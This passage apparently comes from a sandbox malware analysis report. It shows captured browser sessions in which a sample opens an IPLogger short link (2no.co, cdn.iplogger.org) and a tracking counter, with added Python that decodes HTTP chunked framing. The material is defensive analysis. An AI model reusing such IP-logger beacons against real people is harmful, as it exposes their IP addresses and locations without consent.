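    for key, value in triage(ENVIRONMENT_CAB_PREFIX, CONTENT_LENGTH).items():
        print(f"{key}: {value}")
```

Only the structures that fit in the captured prefix are parsed; the checksum and the MSZIP payload itself are not verified here, since the capture shows only the leading bytes of each fragment. A mismatch in any of the triage fields (a cabinet length that does not line up with the first block, or a trailer that does not fill the response) would be the signal to pull the full body from the PCAP rather than trust the header.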


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49713 | 104.21.79.229 | 443 | 7716 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-29 22:54:43 UTC | 655 | OUT | GET /24RXx6 HTTP/1.1
Host: 2no.co
Connection: keep-alive
sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-07-29 22:54:44 UTC | 1086 | IN | HTTP/1.1 200 OK
Date: Mon, 29 Jul 2024 22:54:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
set-cookie: 54988964137263905=1; expires=Tue, 29 Jul 2025 22:54:44 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
set-cookie: unikey=unikey_111af4b0f8f4030923b23caff58edef7fe7e844efbe57a3c5b8fdce1219d7f8d; path=/; secure; HttpOnly; SameSite=Strict
memory: 0.4222412109375
expires: Mon, 29 Jul 2024 22:54:44 +0000
strict-transport-security: max-age=604800
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
x-frame-options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hOBIHIglY7232vFi5NfA4qKt9PcsbEZE3WJUXdEW1wE%2F5Ratgd6cxx4gZ5wuWNNpUJGm0B60Cvo87o8yV9UZcrlz9a%2BrZjO0exgAhbtSXojIZWVGs30zMBQ%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ab0b1434e8232ca-EWR
alt-svc: h3=":443"; ma=86400
2024-07-29 22:54:44 UTC | 283 | IN | Data Raw: 32 36 62 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 55 53 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 42 72 61 6e 64 65 64 20 53 68 6f 72 74 20 44 6f 6d 61 69 6e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e
Data Ascii: 26b5<!DOCTYPE html><html lang="US" class="html"><head><title>Branded Short Domain</title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" conten
2024-07-29 22:54:44 UTC | 1369 | IN | Data Raw: 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 79 65 73 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 44 65 6f 72 67 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 c2 a9 20 49 50 4c 6f 67 67 65 72 20 32 30 31 30 2d 32 30 32 34 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f
Data Ascii: al-scale=1, user-scalable=yes"><meta name="author" content="Deorg" /><meta name="copyright" content="Copyright IPLogger 2010-2024" /><meta name="robots" content="index, follow" /><meta name="revisit-after" content="7 days" /><meta name="keywo
2024-07-29 22:54:44 UTC | 1369 | IN | Data Raw: 23 45 35 45 35 45 35 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 30 2e 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 38 30 30 70 78 29 7b 62 6f 64 79 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 7d 7d 23 6c 6f 61 64 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 70 78 3b 6c 65 66 74 3a 30 70 78 3b 72 69 67 68 74 3a 30 70 78 3b 62 6f 74 74 6f 6d 3a 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 35 45 35 45 35 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 30 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 35 30 70 78 3b
Data Ascii: #E5E5E5;font-family:Helvetica,Arial,sans-serif;letter-spacing:0.2px;font-size:1em}@media screen and (max-width:800px){body{font-size:1.2em}}#loader{position:absolute;top:0px;left:0px;right:0px;bottom:0px;background:#E5E5E5;z-index:10000;padding-top:250px;
2024-07-29 22:54:44 UTC | 1369 | IN | Data Raw: 6e 20 74 6f 20 64 69 73 70 6c 61 79 20 74 68 65 20 6d 61 70 2e 2e 2e 22 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 32 35 30 70 78 3b 74 6f 70 3a 32 35 25 3b 6c 65 66 74 3a 63 61 6c 63 28 35 30 25 20 2d 20 31 32 35 70 78 29 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 63 6f 6c 6f 72 3a 23 38 31 38 31 38 31 7d 0a 09 23 6d 65 7b 62 6f 72 64 65 72 3a 31 70 78 20 64 61 73 68 65 64 20 62 6c 61 63 6b 3b 68 65 69 67 68 74 3a 34 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 34 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 0a 09 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 38 30 30 70 78 29 7b 23 6d 61 70 70 65 72 7b 68 65 69 67 68 74 3a 33 30
Data Ascii: n to display the map...";position:absolute;width:250px;top:25%;left:calc(50% - 125px);text-align:center;font-size:24px;color:#818181}#me{border:1px dashed black;height:40px;line-height:40px;text-align:center}@media (max-width: 800px){#mapper{height:30
2024-07-29 22:54:44 UTC | 1369 | IN | Data Raw: 65 74 52 65 71 75 65 73 74 48 65 61 64 65 72 28 22 41 63 63 65 70 74 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 29 2c 78 2e 73 65 74 52 65 71 75 65 73 74 48 65 61 64 65 72 28 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 29 2c 78 2e 73 65 6e 64 28 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 64 61 74 61 29 29 2c 78 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 6a 73 6f 6e 29 7b 69 66 28 74 68 69 73 2e 72 65 61 64 79 53 74 61 74 65 21 3d 34 29 72 65 74 75 72 6e 3b 74 72 79 7b 6a 73 6f 6e 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 74 68 69 73 2e 72 65 73 70 6f 6e 73 65 54 65 78 74 29 7d 63 61 74 63 68 28 65 29 7b 6a 73 6f 6e 3d 7b 7d 7d 3b 63 61 6c 6c 62 61 63 6b 28 6a 73 6f 6e 29 7d 7d 0a
Data Ascii: etRequestHeader("Accept","application/json"),x.setRequestHeader("Content-Type","application/json"),x.send(JSON.stringify(data)),x.onload=function(json){if(this.readyState!=4)return;try{json=JSON.parse(this.responseText)}catch(e){json={}};callback(json)}}
2024-07-29 22:54:44 UTC | 1369 | IN | Data Raw: 65 3a 32 38 70 78 3b 0a 09 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 0a 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 0a 09 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 0a 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 63 6f 6e 74 65 6e 74 20 7b 0d 09 70 61 64 64 69 6e 67 3a 20 35 70 78 20 30 70 78 3b 0a 09 6d 61 72 67 69 6e 3a 30 3b 0a 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 31 70 78 3b 0a 09 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0a 09 74 65 78 74 2d 61 6c 69 67 6e 3a 6a 75 73 74 69 66 79 0a 7d 0a 2e 68 61 6e 64 73 68 61 6b 65 20 7b 0a 7d 0a 2e 68 61 6e 64 73 68 61 6b 65 20 3e 20 69 6d 67 20 7b 0a 09 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 0a 09 62 6f 72
Data Ascii: e:28px;font-style:normal;font-weight:bold;color:#333333;text-align: center;}.content {padding: 5px 0px;margin:0;line-height:21px;color:#333333;font-size:14px;text-align:justify}.handshake {}.handshake > img {display:block;bor
2024-07-29 22:54:44 UTC | 1369 | IN | Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 68 65 69 67 68 74 3a 20 36 30 30 70 78 29 2c 0a 0a 7d 0a 0a 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 36 30 30 70 78 29 20 7b 0d 09 70 2c 20 75 6c 20 6c 69 2c 20 6f 6c 20 6c 69 2c 20 61 20 7b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 25 21 69 6d 70 6f 72 74 61 6e 74 20 7d 0a 09 68 31 2c 20 68 32 2c 20 68 33 2c 20 68 31 20 61 2c 20 68 32 20 61 2c 20 68 33 20 61 20 7b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 32 30 25 20 7d 0a 09 68 31 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 34 32 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 20 7d 0a 09 68 32 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a
Data Ascii: only screen and (max-height: 600px),}@media only screen and (max-width:600px) {p, ul li, ol li, a { line-height:150%!important }h1, h2, h3, h1 a, h2 a, h3 a { line-height:120% }h1 { font-size:42px!important; text-align:center }h2 { font-size:
2024-07-29 22:54:44 UTC | 1369 | IN | Data Raw: 75 62 6d 69 74 22 3e 0a 09 09 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 22 20 6d 65 74 68 6f 64 3d 22 50 4f 53 54 22 3e 0a 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 6b 65 79 22 20 76 61 6c 75 65 3d 22 75 6e 69 6b 65 79 5f 31 31 31 61 66 34 62 30 66 38 66 34 30 33 30 39 32 33 62 32 33 63 61 66 66 35 38 65 64 65 66 37 66 65 37 65 38 34 34 65 66 62 65 35 37 61 33 63 35 62 38 66 64 63 65 31 32 31 39 64 37 66 38 64 22 3e 0a 09 09 09 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 6f 6b 22 20 6e 61 6d 65 3d 22 63 6f 6e 73 65 6e 74 22 20 76 61 6c 75 65 3d 22 31 22 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 3e 41 67 72 65 65 20 26 20 43 6f 6e 74 69 6e 75 65 3c 2f 62 75 74 74 6f 6e 3e 0a 0a 09 09 09 3c 64 69 76 20 63 6c
Data Ascii: ubmit"><form action="" method="POST"><input type="hidden" name="key" value="unikey_111af4b0f8f4030923b23caff58edef7fe7e844efbe57a3c5b8fdce1219d7f8d"><button class="ok" name="consent" value="1" type="submit">Agree & Continue</button><div cl
2024-07-29 22:54:44 UTC | 51 | IN | Data Raw: 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: .body.appendChild(a);</script></body></html>
2024-07-29 22:54:44 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
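The 2no.co response above is sent with Transfer-Encoding: chunked, which is why the first body fragment opens with 26b5 and the last one is a bare 0: those are chunk framing, not page content, and the 0d 0a that closes the 51-byte fragment after </html> is the CRLF that ends the chunk data. The following is an added example for this report, not Joe Sandbox code and not code from the page the browser opened. It implements the chunked decoder a proxy or IDS needs, and for this capture, where only fragment sizes and leading bytes are shown, it accounts for every body byte: the ten IN fragments add up to exactly one 0x26b5 = 9909-byte chunk (size line, data, CRLF) plus the five-byte last-chunk marker. The body passed to decode_chunked() in the __main__ block is constructed for illustration.

```python
"""Chunked transfer-coding framing in the 2no.co response (session 1 above).

Added example for this report, not code from Joe Sandbox or from the site the
malware opened. The capture lists each response fragment's size but shows only
its leading bytes, so the HTML cannot be reassembled here; the framing can be
checked, and decode_chunked() is the full decoder for a complete body.
"""
import re

# From the report: first bytes of the first body fragment (283 bytes, IN).
FIRST_FRAGMENT_PREFIX = bytes.fromhex(
    "32 36 62 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e")
# From the report: the whole final fragment (5 bytes, IN).
LAST_FRAGMENT = bytes.fromhex("30 0d 0a 0d 0a")
# From the report: "Bytes transferred" of every body fragment after the headers.
IN_FRAGMENT_SIZES = [283, 1369, 1369, 1369, 1369, 1369, 1369, 1369, 51, 5]

# chunk-size in hex, optionally followed by chunk extensions (";name=value").
CHUNK_SIZE_LINE = re.compile(rb"^([0-9A-Fa-f]+)(?:;[^\r\n]*)?$")


def read_chunk_size(data, pos=0):
    """Parse the chunk-size line at data[pos:]; return (size, position after its CRLF)."""
    end = data.find(b"\r\n", pos)
    if end < 0:
        raise ValueError("chunk-size line is not CRLF-terminated")
    match = CHUNK_SIZE_LINE.match(data[pos:end])
    if not match:
        raise ValueError("malformed chunk-size line: %r" % data[pos:end])
    return int(match.group(1), 16), end + 2


def decode_chunked(body):
    """Decode a complete chunked body (RFC 9112, section 7.1) into its payload.

    Chunk extensions are skipped and trailer fields are consumed. A chunk that
    is shorter than its declared size or not followed by CRLF raises rather
    than being guessed at, since such bodies are exactly where request
    smuggling and desync bugs hide.
    """
    out, pos = bytearray(), 0
    while True:
        size, pos = read_chunk_size(body, pos)
        if size == 0:
            # Last chunk: skip any trailer fields up to the empty line.
            while True:
                end = body.find(b"\r\n", pos)
                if end < 0:
                    raise ValueError("missing final CRLF after last chunk")
                if end == pos:
                    return bytes(out)
                pos = end + 2
        chunk = body[pos:pos + size]
        if len(chunk) != size:
            raise ValueError("chunk truncated: declared %d bytes, got %d" % (size, len(chunk)))
        out += chunk
        pos += size
        if body[pos:pos + 2] != b"\r\n":
            raise ValueError("chunk data not followed by CRLF")
        pos += 2


def check_capture_framing(first_prefix, fragment_sizes, last_fragment):
    """Account for every body byte in a capture that shows sizes but not contents.

    Returns (chunk_size, bytes_seen, consistent). consistent is True when the
    fragments add up to exactly one chunk (size line + data + CRLF) followed by
    the last-chunk marker 0 CRLF CRLF, i.e. the whole page was one chunk.
    """
    size, header_len = read_chunk_size(first_prefix)
    if last_fragment != b"0\r\n\r\n":
        raise ValueError("capture does not end with the last-chunk marker")
    expected = header_len + size + 2 + len(last_fragment)
    seen = sum(fragment_sizes)
    return size, seen, seen == expected


if __name__ == "__main__":
    print(check_capture_framing(FIRST_FRAGMENT_PREFIX, IN_FRAGMENT_SIZES, LAST_FRAGMENT))
    # Constructed sample body, not from the capture.
    print(decode_chunked(b"4\r\nWiki\r\n5\r\npedia\r\n0\r\n\r\n"))
```

A framing total that did not match (a missing terminator, or more bytes than one chunk accounts for) would mean the capture truncated the response or that a second chunk was sent; for this session the numbers close exactly, so the 9909 bytes between the size line and the terminator are the complete IPLogger consent page, including the hidden unikey field that mirrors the unikey cookie set in the response headers.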


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 49719 | 104.21.4.208 | 443 | 7716 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-29 22:54:44 UTC | 588 | OUT | GET /redirect/handshake.png HTTP/1.1
Host: cdn.iplogger.org
Connection: keep-alive
sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://2no.co/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-07-29 22:54:45 UTC | 1285 | IN | HTTP/1.1 403 Forbidden
Date: Mon, 29 Jul 2024 22:54:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
2024-07-29 22:54:45 UTC | 695 | IN | Data Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 57 6f 42 4f 78 66 5a 59 70 41 6f 6d 4e 66 6b 43 77 6d 4d 38 2f 79 71 30 5a 57 6f 67 6c 42 7a 69 34 32 4c 55 6e 67 4a 4a 6a 39 72 77 51 42 47 75 2b 64 57 69 58 63 68 78 59 76 4f 47 4c 51 69 4b 6c 68 78 61 53 77 2b 63 4f 32 6d 54 4f 76 44 76 2b 61 6a 4c 6c 56 48 7a 59 39 4a 66 49 31 4a 56 5a 67 52 47 69 6d 6f 6c 57 4e 77 3d 24 34 66 65 69 4d 78 36 6a 49 52 5a 4c 2b 7a 78 79 59 63 46 4f 51 51 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
Data Ascii: cf-chl-out: WoBOxfZYpAomNfkCwmM8/yq0ZWoglBzi42LUngJJj9rwQBGu+dWiXchxYvOGLQiKlhxaSw+cO2mTOvDv+ajLlVHzY9JfI1JVZgRGimolWNw=$4feiMx6jIRZL+zxyYcFOQQ==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
2024-07-29 22:54:45 UTC | 1369 | IN | Data Raw: 33 65 66 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
Data Ascii: 3efd<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
2024-07-29 22:54:45 UTC | 1369 | IN | Data Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.9 | 49720 | 88.212.201.198 | 443 | 7716 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-29 22:54:45 UTC | 665 | OUT | GET /hit?t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.7654828449535682 HTTP/1.1
Host: counter.yadro.ru
Connection: keep-alive
sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://2no.co/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-07-29 22:54:45 UTC | 602 | IN | HTTP/1.1 302 Moved Temporarily
Server: nginx/1.17.9
Date: Mon, 29 Jul 2024 22:54:45 GMT
Content-Type: text/html
Content-Length: 32
Connection: close
Location: https://counter.yadro.ru/hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.7654828449535682
Expires: Sun, 30 Jul 2023 21:00:00 GMT
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="/w3c/p3p.xml", CP="UNI"
Set-Cookie: FTID=1cg1sr1pFper1cg1sr001FMX; path=/; expires=Tue, 29 Jul 2025 21:00:00 GMT; HttpOnly; Secure; SameSite=None; domain=.yadro.ru
Strict-Transport-Security: max-age=86400
2024-07-29 22:54:45 UTC | 32 | IN | Data: <html><body>Moved</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.9 | 49726 | 35.190.80.1 | 443 | 7716 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-29 22:54:45 UTC | 539 | OUT | OPTIONS /report/v4?s=CPqke8krabWr3I%2B0nQZrM2XBTRh85vl2pABTFNCSidoCLsuM%2FwVtGNU4ahZho4qN%2FuYUTKxo7XbgrVq19ZYo%2BAluOfIfzCfoAkvjHeJWNGUJK1LfDJpl%2BO7HYJ7smmPZAP9B HTTP/1.1
Host: a.nel.cloudflare.com
Connection: keep-alive
Origin: https://cdn.iplogger.org
Access-Control-Request-Method: POST
Access-Control-Request-Headers: content-type
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-07-29 22:54:45 UTC | 336 | IN | HTTP/1.1 200 OK
Content-Length: 0
access-control-max-age: 86400
access-control-allow-methods: POST, OPTIONS
access-control-allow-origin: *
access-control-allow-headers: content-type, content-length
date: Mon, 29 Jul 2024 22:54:45 GMT
Via: 1.1 google
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.9 | 49728 | 35.190.80.1 | 443 | 7716 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
